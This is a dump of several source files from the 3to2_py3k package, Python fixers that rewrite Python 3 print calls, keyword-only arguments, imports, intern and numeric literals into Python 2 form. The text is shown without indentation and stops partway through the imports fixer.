if isNone(end):
return
if end.type == token.STRING and end.value in ("' '", '" "',
"u' '", 'u" "',
"b' '", 'b" "'):
return
if file is None:
touch_import(None, "sys", parent)
file = Node(syms.power, [Name("sys"),
Node(syms.trailer, [Dot(), Name("stdout")])])
end_part = Node(syms.power, [file,
Node(syms.trailer, [Dot(), Name("write")]),
Node(syms.trailer, [LParen(), end, RParen()])])
end_part.prefix = " "
parent.insert_child(loc, Leaf(token.SEMI, ";"))
parent.insert_child(loc+1, end_part)
def replace_print(pos, opts, old_node=None):
"""
Replace old_node with a new statement.
Also hacks in the "end" functionality.
"""
new_node = new_print(*pos, **opts)
end = None if "end" not in opts else opts["end"].clone()
file = None if "file" not in opts else opts["file"].clone()
if old_node is None:
parent = Node(syms.simple_stmt, [Leaf(token.NEWLINE, "\n")])
i = 0
else:
parent = old_node.parent
i = old_node.remove()
parent.insert_child(i, new_node)
if end is not None and not (end.type == token.STRING and \
end.value in ("'\\n'", '"\\n"')):
add_end_part(end, file, parent, i+1)
return new_node
def new_print(*pos, **opts):
"""
Constructs a new print_stmt node
args is all positional arguments passed to print()
kwargs contains zero or more of the following mappings:
'sep': some string
'file': some file-like object that supports the write() method
'end': some string
"""
children = [Name("print")]
sep = None if "sep" not in opts else opts["sep"]
file = None if "file" not in opts else opts["file"]
end = None if "end" not in opts else opts["end"]
add_file_part(file, children)
add_sep_part(sep, pos, children)
if end is not None and not isNone(end):
if not end.value in ('"\\n"', "'\\n'"):
children.append(Comma())
return Node(syms.print_stmt, children)
def map_printargs(args):
"""
Accepts a list of all nodes in the print call's trailer.
Returns {'pos':[all,pos,args], 'sep':sep, 'end':end, 'file':file}
"""
printargs = [arg for arg in gen_printargs(args)]
mapping = {}
pos = []
for arg in printargs:
if arg.type == syms.argument:
kids = arg.children
assert kids[0].type == token.NAME, repr(arg)
assert len(kids) > 1, repr(arg)
assert str(kids[0].value) in ("sep", "end", "file")
assert str(kids[0].value) not in mapping, mapping
mapping[str(kids[0].value)] = kids[2]
elif arg.type == token.STAR:
return (None, None)
else:
pos.append(arg)
return (pos, mapping)
class FixPrint(fixer_base.BaseFix):
PATTERN = """
power< 'print' parens=trailer < '(' args=any* ')' > any* >
"""
def match(self, node):
"""
Since the tree needs to be fixed once and only once if and only if it
matches, then we can start discarding matches after we make the first.
"""
return super(FixPrint,self).match(node)
def transform(self, node, results):
args = results.get("args")
if not args:
parens = results.get("parens")
parens.remove()
return
pos, opts = map_printargs(args)
if pos is None or opts is None:
self.cannot_convert(node, "-fprint does not support argument unpacking. fix using -xprint and then again with -fprintfunction.")
return
if "file" in opts and \
"end" in opts and \
opts["file"].type != token.NAME:
self.warning(opts["file"], "file is not a variable name; "\
"print fixer suggests to bind the file to a variable "\
"name first before passing it to print function")
try:
with warnings.catch_warnings(record=True) as w:
new_node = replace_print(pos, opts, old_node=node)
if len(w) > 0:
self.warning(node, "coercing to unicode even though this may be a bytes object")
except AttributeError:
# Python 2.5 doesn't have warnings.catch_warnings, so we're in Python 2.5 code here...
new_node = replace_print(pos, dict([(bytes(k), opts[k]) for k in opts]), old_node=node)
new_node.prefix = node.prefix | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_print.py | fix_print.py |
from lib2to3 import fixer_base
from ..fixer_util import token, indentation, suitify, String, Newline, Comma, DoubleStar, Name
_assign_template = "%(name)s = %(kwargs)s['%(name)s']; del %(kwargs)s['%(name)s']"
_if_template = "if '%(name)s' in %(kwargs)s: %(assign)s"
_else_template = "else: %(name)s = %(default)s"
_kwargs_default_name = "_3to2kwargs"
def gen_params(raw_params):
"""
Generator that yields tuples of (name, default_value) for each parameter in the list
If no default is given, then it is default_value is None (not Leaf(token.NAME, 'None'))
"""
assert raw_params[0].type == token.STAR and len(raw_params) > 2
curr_idx = 2 # the first place a keyword-only parameter name can be is index 2
max_idx = len(raw_params)
while curr_idx < max_idx:
curr_item = raw_params[curr_idx]
prev_item = curr_item.prev_sibling
if curr_item.type != token.NAME:
curr_idx += 1
continue
if prev_item is not None and prev_item.type == token.DOUBLESTAR:
break
name = curr_item.value
nxt = curr_item.next_sibling
if nxt is not None and nxt.type == token.EQUAL:
default_value = nxt.next_sibling
curr_idx += 2
else:
default_value = None
yield (name, default_value)
curr_idx += 1
def remove_params(raw_params, kwargs_default=_kwargs_default_name):
"""
Removes all keyword-only args from the params list and a bare star, if any.
Does not add the kwargs dict if needed.
Returns True if more action is needed, False if not
(more action is needed if no kwargs dict exists)
"""
assert raw_params[0].type == token.STAR
if raw_params[1].type == token.COMMA:
raw_params[0].remove()
raw_params[1].remove()
kw_params = raw_params[2:]
else:
kw_params = raw_params[3:]
for param in kw_params:
if param.type != token.DOUBLESTAR:
param.remove()
else:
return False
else:
return True
def needs_fixing(raw_params, kwargs_default=_kwargs_default_name):
"""
Returns string with the name of the kwargs dict if the params after the first star need fixing
Otherwise returns empty string
"""
found_kwargs = False
needs_fix = False
for t in raw_params[2:]:
if t.type == token.COMMA:
# Commas are irrelevant at this stage.
continue
elif t.type == token.NAME and not found_kwargs:
# Keyword-only argument: definitely need to fix.
needs_fix = True
elif t.type == token.NAME and found_kwargs:
# Return 'foobar' of **foobar, if needed.
return t.value if needs_fix else ''
elif t.type == token.DOUBLESTAR:
# Found either '*' from **foobar.
found_kwargs = True
else:
# Never found **foobar. Return a synthetic name, if needed.
return kwargs_default if needs_fix else ''
class FixKwargs(fixer_base.BaseFix):
run_order = 7 # Run after function annotations are removed
PATTERN = "funcdef< 'def' NAME parameters< '(' arglist=typedargslist< params=any* > ')' > ':' suite=any >"
def transform(self, node, results):
params_rawlist = results["params"]
for i, item in enumerate(params_rawlist):
if item.type == token.STAR:
params_rawlist = params_rawlist[i:]
break
else:
return
# params is guaranteed to be a list starting with *.
# if fixing is needed, there will be at least 3 items in this list:
# [STAR, COMMA, NAME] is the minimum that we need to worry about.
new_kwargs = needs_fixing(params_rawlist)
# new_kwargs is the name of the kwargs dictionary.
if not new_kwargs:
return
suitify(node)
# At this point, params_rawlist is guaranteed to be a list
# beginning with a star that includes at least one keyword-only param
# e.g., [STAR, NAME, COMMA, NAME, COMMA, DOUBLESTAR, NAME] or
# [STAR, COMMA, NAME], or [STAR, COMMA, NAME, COMMA, DOUBLESTAR, NAME]
# Anatomy of a funcdef: ['def', 'name', parameters, ':', suite]
# Anatomy of that suite: [NEWLINE, INDENT, first_stmt, all_other_stmts]
# We need to insert our new stuff before the first_stmt and change the
# first_stmt's prefix.
suite = node.children[4]
first_stmt = suite.children[2]
ident = indentation(first_stmt)
for name, default_value in gen_params(params_rawlist):
if default_value is None:
suite.insert_child(2, Newline())
suite.insert_child(2, String(_assign_template %{'name':name, 'kwargs':new_kwargs}, prefix=ident))
else:
suite.insert_child(2, Newline())
suite.insert_child(2, String(_else_template %{'name':name, 'default':default_value}, prefix=ident))
suite.insert_child(2, Newline())
suite.insert_child(2, String(_if_template %{'assign':_assign_template %{'name':name, 'kwargs':new_kwargs}, 'name':name, 'kwargs':new_kwargs}, prefix=ident))
first_stmt.prefix = ident
suite.children[2].prefix = ""
# Now, we need to fix up the list of params.
must_add_kwargs = remove_params(params_rawlist)
if must_add_kwargs:
arglist = results['arglist']
if len(arglist.children) > 0 and arglist.children[-1].type != token.COMMA:
arglist.append_child(Comma())
arglist.append_child(DoubleStar(prefix=" "))
arglist.append_child(Name(new_kwargs)) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_kwargs.py | fix_kwargs.py |
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, is_probably_builtin, Newline, does_tree_import
from lib2to3.pygram import python_symbols as syms
from lib2to3.pgen2 import token
from lib2to3.pytree import Node, Leaf
from ..fixer_util import NameImport
# used in simple_mapping_to_pattern()
MAPPING = {"reprlib": "repr",
"winreg": "_winreg",
"configparser": "ConfigParser",
"copyreg": "copy_reg",
"queue": "Queue",
"socketserver": "SocketServer",
"_markupbase": "markupbase",
"test.support": "test.test_support",
"dbm.bsd": "dbhash",
"dbm.ndbm": "dbm",
"dbm.dumb": "dumbdbm",
"dbm.gnu": "gdbm",
"html.parser": "HTMLParser",
"html.entities": "htmlentitydefs",
"http.client": "httplib",
"http.cookies": "Cookie",
"http.cookiejar": "cookielib",
# "tkinter": "Tkinter",
"tkinter.dialog": "Dialog",
"tkinter._fix": "FixTk",
"tkinter.scrolledtext": "ScrolledText",
"tkinter.tix": "Tix",
"tkinter.constants": "Tkconstants",
"tkinter.dnd": "Tkdnd",
"tkinter.__init__": "Tkinter",
"tkinter.colorchooser": "tkColorChooser",
"tkinter.commondialog": "tkCommonDialog",
"tkinter.font": "tkFont",
"tkinter.messagebox": "tkMessageBox",
"tkinter.turtle": "turtle",
"urllib.robotparser": "robotparser",
"xmlrpc.client": "xmlrpclib",
"builtins": "__builtin__",
}
# generic strings to help build patterns
# these variables mean (with http.client.HTTPConnection as an example):
# name = http
# attr = client
# used = HTTPConnection
# fmt_name is a formatted subpattern (simple_name_match or dotted_name_match)
# helps match 'queue', as in 'from queue import ...'
simple_name_match = "name='%s'"
# helps match 'client', to be used if client has been imported from http
subname_match = "attr='%s'"
# helps match 'http.client', as in 'import urllib.request'
dotted_name_match = "dotted_name=dotted_name< %s '.' %s >"
# helps match 'queue', as in 'queue.Queue(...)'
power_onename_match = "%s"
# helps match 'http.client', as in 'http.client.HTTPConnection(...)'
power_twoname_match = "power< %s trailer< '.' %s > any* >"
# helps match 'client.HTTPConnection', if 'client' has been imported from http
power_subname_match = "power< %s any* >"
# helps match 'from http.client import HTTPConnection'
from_import_match = "from_import=import_from< 'from' %s 'import' imported=any >"
# helps match 'from http import client'
from_import_submod_match = "from_import_submod=import_from< 'from' %s 'import' (%s | import_as_name< %s 'as' renamed=any > | import_as_names< any* (%s | import_as_name< %s 'as' renamed=any >) any* > ) >"
# helps match 'import urllib.request'
name_import_match = "name_import=import_name< 'import' %s > | name_import=import_name< 'import' dotted_as_name< %s 'as' renamed=any > >"
# helps match 'import http.client, winreg'
multiple_name_import_match = "name_import=import_name< 'import' dotted_as_names< names=any* > >"
def all_patterns(name):
"""
Accepts a string and returns a pattern of possible patterns involving that name
Called by simple_mapping_to_pattern for each name in the mapping it receives.
"""
# i_ denotes an import-like node
# u_ denotes a node that appears to be a usage of the name
if '.' in name:
name, attr = name.split('.', 1)
simple_name = simple_name_match % (name)
simple_attr = subname_match % (attr)
dotted_name = dotted_name_match % (simple_name, simple_attr)
i_from = from_import_match % (dotted_name)
i_from_submod = from_import_submod_match % (simple_name, simple_attr, simple_attr, simple_attr, simple_attr)
i_name = name_import_match % (dotted_name, dotted_name)
u_name = power_twoname_match % (simple_name, simple_attr)
u_subname = power_subname_match % (simple_attr)
return ' | \n'.join((i_name, i_from, i_from_submod, u_name, u_subname))
else:
simple_name = simple_name_match % (name)
i_name = name_import_match % (simple_name, simple_name)
i_from = from_import_match % (simple_name)
u_name = power_onename_match % (simple_name)
return ' | \n'.join((i_name, i_from, u_name))
class FixImports(fixer_base.BaseFix):
PATTERN = ' | \n'.join([all_patterns(name) for name in MAPPING])
PATTERN = ' | \n'.join((PATTERN, multiple_name_import_match))
def fix_dotted_name(self, node, mapping=MAPPING):
"""
Accepts either a DottedName node or a power node with a trailer.
If mapping is given, use it; otherwise use our MAPPING
Returns a node that can be in-place replaced by the node given
"""
if node.type == syms.dotted_name:
_name = node.children[0]
_attr = node.children[2]
elif node.type == syms.power:
_name = node.children[0]
_attr = node.children[1].children[1]
name = _name.value
attr = _attr.value
full_name = name + '.' + attr
if not full_name in mapping:
return
to_repl = mapping[full_name]
if '.' in to_repl:
repl_name, repl_attr = to_repl.split('.')
_name.replace(Name(repl_name, prefix=_name.prefix))
_attr.replace(Name(repl_attr, prefix=_attr.prefix))
elif node.type == syms.dotted_name:
node.replace(Name(to_repl, prefix=node.prefix))
elif node.type == syms.power:
_name.replace(Name(to_repl, prefix=_name.prefix))
parent = _attr.parent
_attr.remove()
parent.remove()
def fix_simple_name(self, node, mapping=MAPPING):
"""
Accepts a Name leaf.
If mapping is given, use it; otherwise use our MAPPING
Returns a node that can be in-place replaced by the node given
"""
assert node.type == token.NAME, repr(node)
if not node.value in mapping:
return
replacement = mapping[node.value]
node.replace(Leaf(token.NAME, str(replacement), prefix=node.prefix))
def fix_submod_import(self, imported, name, node):
"""
Accepts a list of NAME leafs, a name string, and a node
node is given as an argument to BaseFix.transform()
NAME leafs come from an import_as_names node (the children)
name string is the base name found in node.
"""
submods = []
missed = []
for attr in imported:
dotted = '.'.join((name, attr.value))
if dotted in MAPPING:
# get the replacement module
to_repl = MAPPING[dotted]
if '.' not in to_repl:
# it's a simple name, so use a simple replacement.
_import = NameImport(Name(to_repl, prefix=" "), attr.value)
submods.append(_import)
elif attr.type == token.NAME:
missed.append(attr.clone())
if not submods:
return
parent = node.parent
node.replace(submods[0])
if len(submods) > 1:
start = submods.pop(0)
prev = start
for submod in submods:
parent.append_child(submod)
if missed:
self.warning(node, "Imported names not known to 3to2 to be part of the package %s. Leaving those alone... high probability that this code will be incorrect." % (name))
children = [Name("from"), Name(name, prefix=" "), Name("import", prefix=" "), Node(syms.import_as_names, missed)]
orig_stripped = Node(syms.import_from, children)
parent.append_child(Newline())
parent.append_child(orig_stripped)
def get_dotted_import_replacement(self, name_node, attr_node, mapping=MAPPING, renamed=None):
"""
For (http, client) given and httplib being the correct replacement,
returns (httplib as client, None)
For (test, support) given and test.test_support being the replacement,
returns (test, test_support as support)
"""
full_name = name_node.value + '.' + attr_node.value
replacement = mapping[full_name]
if '.' in replacement:
new_name, new_attr = replacement.split('.')
if renamed is None:
return Name(new_name, prefix=name_node.prefix), Node(syms.dotted_as_name, [Name(new_attr, prefix=attr_node.prefix), Name('as', prefix=" "), attr_node.clone()])
else:
return Name(new_name, prefix=name_node.prefix), Name(new_attr, prefix=attr_node.prefix)
else:
return Node(syms.dotted_as_name, [Name(replacement, prefix=name_node.prefix), Name('as', prefix=' '), Name(attr_node.value, prefix=attr_node.prefix)]), None
def transform(self, node, results):
from_import = results.get("from_import")
from_import_submod = results.get("from_import_submod")
name_import = results.get("name_import")
dotted_name = results.get("dotted_name")
name = results.get("name")
names = results.get("names")
attr = results.get("attr")
imported = results.get("imported")
if names:
for name in names:
if name.type == token.NAME:
self.fix_simple_name(name)
elif name.type == syms.dotted_as_name:
self.fix_simple_name(name.children[0]) if name.children[0].type == token.NAME else \
self.fix_dotted_name(name.children[0])
elif name.type == syms.dotted_name:
self.fix_dotted_name(name)
elif from_import_submod:
renamed = results.get("renamed")
new_name, new_attr = self.get_dotted_import_replacement(name, attr, renamed=renamed)
if new_attr is not None:
name.replace(new_name)
attr.replace(new_attr)
else:
children = [Name("import"), new_name]
node.replace(Node(syms.import_name, children, prefix=node.prefix))
elif dotted_name:
self.fix_dotted_name(dotted_name)
elif name_import or from_import:
self.fix_simple_name(name)
elif name and not attr:
if does_tree_import(None, MAPPING[name.value], node):
self.fix_simple_name(name)
elif name and attr:
# Note that this will fix a dotted name that was never imported. This will probably not matter.
self.fix_dotted_name(node)
elif imported and imported.type == syms.import_as_names:
self.fix_submod_import(imported=imported.children, node=node, name=name.value) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/imports_fix_alt_formatting.py | imports_fix_alt_formatting.py |
from lib2to3 import pytree
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, BlankLine, find_binding, find_root
class FixIntern(fixer_base.BaseFix):
PATTERN = """
power< 'sys' trailer < '.' 'intern' >
trailer< lpar='('
( not(arglist | argument<any '=' any>) obj=any
| obj=arglist<(not argument<any '=' any>) any ','> )
rpar=')' >
after=any* >
|
import_from< 'from' 'sys' 'import'
import_as_names< pre=any* binding='intern' post=any* > any* >
|
import_from< 'from' 'sys' 'import' simple='intern' >
"""
def transform(self, node, results):
name = results.get("name")
binding = results.get("binding")
pre = results.get("pre")
post = results.get("post")
simple = results.get("simple")
if simple:
binding = find_binding("intern", find_root(node), "sys")
binding.remove()
return
if binding:
if not pre and not post:
new_binding = find_binding("intern", find_root(node), "sys")
new_binding.remove()
return
elif not pre and post:
for ch in node.children:
if type(ch) == pytree.Node:
assert ch.children[0].prefix + "intern" \
== str(ch.children[0])
ch.children[0].remove() # intern
assert ch.children[0].prefix + "," \
== str(ch.children[0])
ch.children[0].remove() # ,
return
elif not post and pre:
for ch in node.children:
if type(ch) == pytree.Node:
assert ch.children[-1].prefix + "intern" \
== str(ch.children[-1])
ch.children[-1].remove() # intern
assert ch.children[-1].prefix + "," \
== str(ch.children[-1])
ch.children[-1].remove() # ,
return
elif post and pre:
for ch in node.children:
if type(ch) == pytree.Node:
for ch_ in ch.children:
if ch_ and ch_.prefix + "intern" == str(ch_):
last_ch_ = ch_.prev_sibling
ch_.remove() # intern
assert last_ch_.prefix + "," \
== str(last_ch_)
last_ch_.remove() # ,
return
syms = self.syms
obj = results["obj"].clone()
if obj.type == syms.arglist:
newarglist = obj.clone()
else:
newarglist = pytree.Node(syms.arglist, [obj.clone()])
after = results["after"]
if after:
after = [n.clone() for n in after]
new = pytree.Node(syms.power,
[Name("intern")] +
[pytree.Node(syms.trailer,
[results["lpar"].clone(),
newarglist,
results["rpar"].clone()] + after)])
new.prefix = node.prefix
return new | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_intern.py | fix_intern.py |
import re
from lib2to3.pgen2 import token
from lib2to3 import fixer_base
from lib2to3.pygram import python_symbols as syms
from lib2to3.pytree import Node
from lib2to3.fixer_util import Number, Call, Attr, String, Name, ArgList, Comma
baseMAPPING = {'b':2, 'o':8, 'x':16}
def base(literal):
"""Returns the base of a valid py3k literal."""
literal = literal.strip()
# All literals that do not start with 0, or are 1 or more zeros.
if not literal.startswith("0") or re.match(r"0+$",literal):
return 10
elif literal[1] not in "box":
return 0
return baseMAPPING[literal[1]]
class FixNumliterals(fixer_base.BaseFix):
# We need to modify all numeric literals except floats, complex.
def unmatch(self, node):
"""Don't match complex numbers, floats, or base-10 ints"""
val = node.value
for bad in "jJ+-.":
if bad in val: return bad
base_ = base(val)
return base_ == 10 or base_ == 16
def match(self, node):
"""Match number literals that are not excluded by self.unmatch"""
return (node.type == token.NUMBER) and not self.unmatch(node)
def transform(self, node, results):
"""
Call __builtins__.long() with the value and the base of the value.
This works because 0b10 is int("10", 2), 0o10 is int("10", 8), etc.
"""
val = node.value
base_ = base(val)
if base_ == 8:
assert val.strip().startswith("0o") or \
val.strip().startswith("0O"), "Invalid format for octal literal"
node.changed()
node.value = "".join(("0",val[2:]))
elif base_ == 2:
assert val.startswith("0") and val[1] in "bB", \
"Invalid format for binary literal"
# __builtins__.long
func_name = Node(syms.power, Attr(Name("__builtins__"), \
Name("long")))
# ("...", 2)
func_args = [String("".join(("\"", val.strip()[2:], "\""))), \
Comma(), Number(2, prefix=" ")]
new_node = Call(func_name, func_args, node.prefix)
return new_node | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_numliterals.py | fix_numliterals.py |
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, String, FromImport, Newline, Comma
from ..fixer_util import token, syms, Leaf, Node, Star, indentation, ImportAsName
TK_BASE_NAMES = ('ACTIVE', 'ALL', 'ANCHOR', 'ARC','BASELINE', 'BEVEL', 'BOTH',
'BOTTOM', 'BROWSE', 'BUTT', 'CASCADE', 'CENTER', 'CHAR',
'CHECKBUTTON', 'CHORD', 'COMMAND', 'CURRENT', 'DISABLED',
'DOTBOX', 'E', 'END', 'EW', 'EXCEPTION', 'EXTENDED', 'FALSE',
'FIRST', 'FLAT', 'GROOVE', 'HIDDEN', 'HORIZONTAL', 'INSERT',
'INSIDE', 'LAST', 'LEFT', 'MITER', 'MOVETO', 'MULTIPLE', 'N',
'NE', 'NO', 'NONE', 'NORMAL', 'NS', 'NSEW', 'NUMERIC', 'NW',
'OFF', 'ON', 'OUTSIDE', 'PAGES', 'PIESLICE', 'PROJECTING',
'RADIOBUTTON', 'RAISED', 'READABLE', 'RIDGE', 'RIGHT',
'ROUND', 'S', 'SCROLL', 'SE', 'SEL', 'SEL_FIRST', 'SEL_LAST',
'SEPARATOR', 'SINGLE', 'SOLID', 'SUNKEN', 'SW', 'StringTypes',
'TOP', 'TRUE', 'TclVersion', 'TkVersion', 'UNDERLINE',
'UNITS', 'VERTICAL', 'W', 'WORD', 'WRITABLE', 'X', 'Y', 'YES',
'wantobjects')
PY2MODULES = {
'urllib2' : (
'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',
'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',
'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',
'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',
'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',
'HTTPHandler', 'HTTPPasswordMgr',
'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',
'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',
'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',
'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',
'build_opener', 'install_opener', 'parse_http_list',
'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),
'urllib' : (
'ContentTooShortError', 'FancyURLopener','URLopener',
'basejoin', 'ftperrors', 'getproxies',
'getproxies_environment', 'localhost', 'pathname2url',
'quote', 'quote_plus', 'splitattr', 'splithost',
'splitnport', 'splitpasswd', 'splitport', 'splitquery',
'splittag', 'splittype', 'splituser', 'splitvalue',
'thishost', 'unquote', 'unquote_plus', 'unwrap',
'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',
'urlretrieve',),
'urlparse' : (
'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',
'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),
'dbm' : (
'ndbm', 'gnu', 'dumb'),
'anydbm' : (
'error', 'open'),
'whichdb' : (
'whichdb',),
'BaseHTTPServer' : (
'BaseHTTPRequestHandler', 'HTTPServer'),
'CGIHTTPServer' : (
'CGIHTTPRequestHandler',),
'SimpleHTTPServer' : (
'SimpleHTTPRequestHandler',),
'FileDialog' : TK_BASE_NAMES + (
'FileDialog', 'LoadFileDialog', 'SaveFileDialog',
'dialogstates', 'test'),
'tkFileDialog' : (
'Directory', 'Open', 'SaveAs', '_Dialog', 'askdirectory',
'askopenfile', 'askopenfilename', 'askopenfilenames',
'askopenfiles', 'asksaveasfile', 'asksaveasfilename'),
'SimpleDialog' : TK_BASE_NAMES + (
'SimpleDialog',),
'tkSimpleDialog' : TK_BASE_NAMES + (
'askfloat', 'askinteger', 'askstring', 'Dialog'),
'SimpleXMLRPCServer' : (
'CGIXMLRPCRequestHandler', 'SimpleXMLRPCDispatcher',
'SimpleXMLRPCRequestHandler', 'SimpleXMLRPCServer',
'list_public_methods', 'remove_duplicates',
'resolve_dotted_attribute'),
'DocXMLRPCServer' : (
'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',
'DocXMLRPCServer', 'ServerHTMLDoc','XMLRPCDocGenerator'),
}
MAPPING = { 'urllib.request' :
('urllib2', 'urllib'),
'urllib.error' :
('urllib2', 'urllib'),
'urllib.parse' :
('urllib2', 'urllib', 'urlparse'),
'dbm.__init__' :
('anydbm', 'whichdb'),
'http.server' :
('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),
'tkinter.filedialog' :
('tkFileDialog', 'FileDialog'),
'tkinter.simpledialog' :
('tkSimpleDialog', 'SimpleDialog'),
'xmlrpc.server' :
('DocXMLRPCServer', 'SimpleXMLRPCServer'),
}
# helps match 'http', as in 'from http.server import ...'
simple_name = "name='{name}'"
# helps match 'server', as in 'from http.server import ...'
simple_attr = "attr='{attr}'"
# helps match 'HTTPServer', as in 'from http.server import HTTPServer'
simple_using = "using='{using}'"
# helps match 'urllib.request', as in 'import urllib.request'
dotted_name = "dotted_name=dotted_name< {fmt_name} '.' {fmt_attr} >"
# helps match 'http.server', as in 'http.server.HTTPServer(...)'
power_twoname = "pow=power< {fmt_name} trailer< '.' {fmt_attr} > trailer< '.' using=any > any* >"
# helps match 'dbm.whichdb', as in 'dbm.whichdb(...)'
power_onename = "pow=power< {fmt_name} trailer< '.' using=any > any* >"
# helps match 'from http.server import HTTPServer'
# also helps match 'from http.server import HTTPServer, SimpleHTTPRequestHandler'
# also helps match 'from http.server import *'
from_import = "from_import=import_from< 'from' {modules} 'import' (import_as_name< using=any 'as' renamed=any> | in_list=import_as_names< using=any* > | using='*' | using=NAME) >"
# helps match 'import urllib.request'
name_import = "name_import=import_name< 'import' ({fmt_name} | in_list=dotted_as_names< imp_list=any* >) >"
#############
# WON'T FIX #
#############
# helps match 'import urllib.request as name'
name_import_rename = "name_import_rename=dotted_as_name< {fmt_name} 'as' renamed=any >"
# helps match 'from http import server'
from_import_rename = "from_import_rename=import_from< 'from' {fmt_name} 'import' ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any > | in_list=import_as_names< any* ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any >) any* >) >"
def all_modules_subpattern():
"""
Builds a pattern for all toplevel names
(urllib, http, etc)
"""
names_dot_attrs = [mod.split(".") for mod in MAPPING]
ret = "( " + " | ".join([dotted_name.format(fmt_name=simple_name.format(name=mod[0]),
fmt_attr=simple_attr.format(attr=mod[1])) for mod in names_dot_attrs])
ret += " | "
ret += " | ".join([simple_name.format(name=mod[0]) for mod in names_dot_attrs if mod[1] == "__init__"]) + " )"
return ret
def all_candidates(name, attr, MAPPING=MAPPING):
"""
Returns all candidate packages for the name.attr
"""
dotted = name + '.' + attr
assert dotted in MAPPING, "No matching package found."
ret = MAPPING[dotted]
if attr == '__init__':
return ret + (name,)
return ret
def new_package(name, attr, using, MAPPING=MAPPING, PY2MODULES=PY2MODULES):
"""
Returns which candidate package for name.attr provides using
"""
for candidate in all_candidates(name, attr, MAPPING):
if using in PY2MODULES[candidate]:
break
else:
candidate = None
return candidate
def build_import_pattern(mapping1, mapping2):
"""
mapping1: A dict mapping py3k modules to all possible py2k replacements
mapping2: A dict mapping py2k modules to the things they do
This builds a HUGE pattern to match all ways that things can be imported
"""
# py3k: urllib.request, py2k: ('urllib2', 'urllib')
yield from_import.format(modules=all_modules_subpattern())
for py3k, py2k in mapping1.items():
name, attr = py3k.split('.')
s_name = simple_name.format(name=name)
s_attr = simple_attr.format(attr=attr)
d_name = dotted_name.format(fmt_name=s_name, fmt_attr=s_attr)
yield name_import.format(fmt_name=d_name)
yield power_twoname.format(fmt_name=s_name, fmt_attr=s_attr)
if attr == '__init__':
yield name_import.format(fmt_name=s_name)
yield power_onename.format(fmt_name=s_name)
yield name_import_rename.format(fmt_name=d_name)
yield from_import_rename.format(fmt_name=s_name, fmt_attr=s_attr)
def name_import_replacement(name, attr):
children = [Name("import")]
for c in all_candidates(name.value, attr.value):
children.append(Name(c, prefix=" "))
children.append(Comma())
children.pop()
replacement = Node(syms.import_name, children)
return replacement
class FixImports2(fixer_base.BaseFix):
run_order = 4
PATTERN = " | \n".join(build_import_pattern(MAPPING, PY2MODULES))
def transform(self, node, results):
# The patterns dictate which of these names will be defined
name = results.get("name")
attr = results.get("attr")
if attr is None:
attr = Name("__init__")
using = results.get("using")
in_list = results.get("in_list")
imp_list = results.get("imp_list")
power = results.get("pow")
before = results.get("before")
after = results.get("after")
d_name = results.get("dotted_name")
# An import_stmt is always contained within a simple_stmt
simple_stmt = node.parent
# The parent is useful for adding new import_stmts
parent = simple_stmt.parent
idx = parent.children.index(simple_stmt)
if any((results.get("from_import_rename") is not None,
results.get("name_import_rename") is not None)):
self.cannot_convert(node, reason="ambiguity: import binds a single name")
elif using is None and not in_list:
# import urllib.request, single-name import
replacement = name_import_replacement(name, attr)
replacement.prefix = node.prefix
node.replace(replacement)
elif using is None:
# import ..., urllib.request, math, http.sever, ...
for d_name in imp_list:
if d_name.type == syms.dotted_name:
name = d_name.children[0]
attr = d_name.children[2]
elif d_name.type == token.NAME and d_name.value + ".__init__" in MAPPING:
name = d_name
attr = Name("__init__")
else:
continue
if name.value + "." + attr.value not in MAPPING:
continue
candidates = all_candidates(name.value, attr.value)
children = [Name("import")]
for c in candidates:
children.append(Name(c, prefix=" "))
children.append(Comma())
children.pop()
# Put in the new statement.
indent = indentation(simple_stmt)
next_stmt = Node(syms.simple_stmt, [Node(syms.import_name, children), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
# Remove the old imported name
test_comma = d_name.next_sibling
if test_comma and test_comma.type == token.COMMA:
test_comma.remove()
elif test_comma is None:
test_comma = d_name.prev_sibling
if test_comma and test_comma.type == token.COMMA:
test_comma.remove()
d_name.remove()
if not in_list.children:
simple_stmt.remove()
elif in_list is not None:
##########################################################
# "from urllib.request import urlopen, urlretrieve, ..." #
# Replace one import statement with potentially many. #
##########################################################
packages = dict([(n,[]) for n in all_candidates(name.value,
attr.value)])
# Figure out what names need to be imported from what
# Add them to a dict to be parsed once we're completely done
for imported in using:
if imported.type == token.COMMA:
continue
if imported.type == syms.import_as_name:
test_name = imported.children[0].value
if len(imported.children) > 2:
# 'as' whatever
rename = imported.children[2].value
else:
rename = None
elif imported.type == token.NAME:
test_name = imported.value
rename = None
pkg = new_package(name.value, attr.value, test_name)
packages[pkg].append((test_name, rename))
# Parse the dict to create new import statements to replace this one
imports = []
for new_pkg, names in packages.items():
if not names:
# Didn't import anything from that package, move along
continue
new_names = []
for test_name, rename in names:
if rename is None:
new_names.append(Name(test_name, prefix=" "))
else:
